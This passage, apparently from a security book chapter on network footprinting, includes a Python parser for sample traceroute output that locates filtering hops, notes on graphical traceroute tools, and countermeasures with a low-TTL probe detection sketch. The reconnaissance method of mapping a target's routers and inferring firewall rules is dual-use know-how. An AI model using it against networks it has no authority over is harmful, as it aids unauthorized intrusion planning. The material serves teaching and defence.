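2 rtr1.bigisp.net (10.10.12.13) 37.442 ms 35.183 ms 38.202 ms
3 rtr2.bigisp.net (10.10.12.14) 73.945 ms 36.336 ms 40.146 ms
4 hssitrt.bigisp.net (10.11.31.14) 54.094 ms 66.162 ms 50.873 ms
5 * * *
6 * * *"""

FIXED_PORT = """traceroute to (10.10.10.2), 30 hops max, 40 byte packets
1 gate (192.168.10.1) 10.029 ms 10.027 ms 8.494 ms
2 rtr1.bigisp.net (10.10.12.13) 36.673 ms 39.141 ms 37.872 ms
3 rtr2.bigisp.net (10.10.12.14) 36.739 ms 39.516 ms 37.226 ms
4 hssitrt.bigisp.net (10.11.31.14) 47.352 ms 47.363 ms 45.914 ms
5 10.10.10.2 (10.10.10.2) 50.449 ms 56.213 ms 65.627 ms"""


def parse_hops(output):
    """Return a list of (hop, name, ip); name and ip are None on timeout."""
    hops = []
    for line in output.splitlines():
        answered = HOP_RE.match(line)
        if answered:
            hops.append((int(answered.group(1)), answered.group(2),
                         answered.group(3)))
            continue
        timed_out = TIMEOUT_RE.match(line)
        if timed_out:
            hops.append((int(timed_out.group(1)), None, None))
    return hops


def last_responding_hop(output):
    """Return the last hop that sent a reply, or None if none did."""
    answered = [hop for hop in parse_hops(output) if hop[2] is not None]
    return answered[-1] if answered else None


if __name__ == "__main__":
    print("default probes stop at:", last_responding_hop(BLOCKED))
    print("fixed-port probes stop at:", last_responding_hop(FIXED_PORT))
```

A run whose last responding hop is an intermediate router rather than the target suggests filtering at or just beyond that hop, which is the conclusion drawn from the first listing.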
Most of what we have done up to this point with traceroute has been command-line
oriented. For the graphically inclined, you can use VisualRoute
(http://www.visualroute.com) or NeoTrace (http://www.neotrace.com/) to perform your
tracerouting. VisualRoute provides a graphical depiction of each network hop and
integrates this with whois queries. VisualRoute, depicted in Figure 1-6, is appealing to
the eye, but does not scale well to large network reconnaissance efforts.
There are additional techniques that will allow you to determine specific ACLs that
are in place for a given access control device. Firewall protocol scanning is one such technique
and is covered in Chapter 11.
Figure 1-6. VisualRoute, the Cadillac of traceroute tools, provides not just router hop information
but also geographic location, whois lookups, and web server banner information.
Countermeasure: Thwarting Network Reconnaissance
In this chapter, we only touched upon network reconnaissance techniques. We shall see
more intrusive techniques in the following chapters. There are, however, several countermeasures
that can be employed to thwart and identify the network reconnaissance probes
discussed thus far. Many of the commercial network intrusion detection systems (NIDSes)
will detect this type of network reconnaissance. In addition, one of the best free NIDS programs,
snort (http://www.snort.org/) by Marty Roesch, can detect this activity. If you are
interested in taking the offensive when someone traceroutes to you, Humble from Rhino9
developed a program called RotoRouter
(http://packetstorm.securify.com/UNIX/loggers/rr-1.0.tgz). This utility is used to log
incoming traceroute requests and generate fake responses. Finally, depending on your
site’s security paradigm, you may be able to configure your border routers to limit ICMP
and UDP traffic to specific systems, thus minimizing your exposure.
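To make the detection idea concrete, here is a rough Python sketch of one heuristic a defender might apply to already-captured packet summaries: traceroute probes tend to arrive near their target with a very low remaining TTL, so a source that repeatedly sends such packets is worth a closer look. This is not how snort or any commercial NIDS implements its checks. The Packet record, the suspected_tracers function, and both thresholds are assumptions invented for this example, and the addresses are documentation placeholders.

```python
from collections import Counter
from typing import Iterable, List, NamedTuple


class Packet(NamedTuple):
    """Hypothetical summary of one captured packet (not a real capture API)."""
    src: str    # source IP address
    proto: str  # "udp", "icmp", "tcp", ...
    ttl: int    # TTL value as observed at the sensor


def suspected_tracers(packets: Iterable[Packet],
                      max_ttl: int = 1,
                      min_count: int = 3) -> List[str]:
    """Return sources that sent at least min_count low-TTL UDP/ICMP packets.

    Both thresholds are illustrative guesses and would need tuning on
    real traffic to keep false positives manageable.
    """
    counts = Counter(
        p.src for p in packets
        if p.proto in ("udp", "icmp") and p.ttl <= max_ttl
    )
    return sorted(src for src, seen in counts.items() if seen >= min_count)


if __name__ == "__main__":
    sample = [
        Packet("203.0.113.7", "udp", 1),
        Packet("203.0.113.7", "udp", 1),
        Packet("203.0.113.7", "udp", 1),
        Packet("198.51.100.20", "udp", 57),
        Packet("198.51.100.20", "tcp", 1),
    ]
    print(suspected_tracers(sample))
```

A heuristic like this only identifies the probing; limiting ICMP and UDP at the border, as described above, is what actually reduces exposure.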
SUMMARY
As you have seen, attackers can perform network reconnaissance or footprint your network
in many different ways. We have purposely limited our discussion to common
tools and techniques. Bear in mind, however, that new tools are released daily. Moreover,
we chose a simplistic example to illustrate the concepts of footprinting. Often you will be
faced with the daunting task of trying to identify and footprint tens or hundreds of domains.
Therefore, we prefer to automate as many tasks as possible via a combination of
shell and expect scripts or Perl programs. In addition, there are many attackers well
schooled in performing network reconnaissance activities without ever being discovered,
and they are suitably equipped. Thus, it is important to remember to minimize the
amount and types of information leaked by your Internet presence and to implement vigilant
monitoring.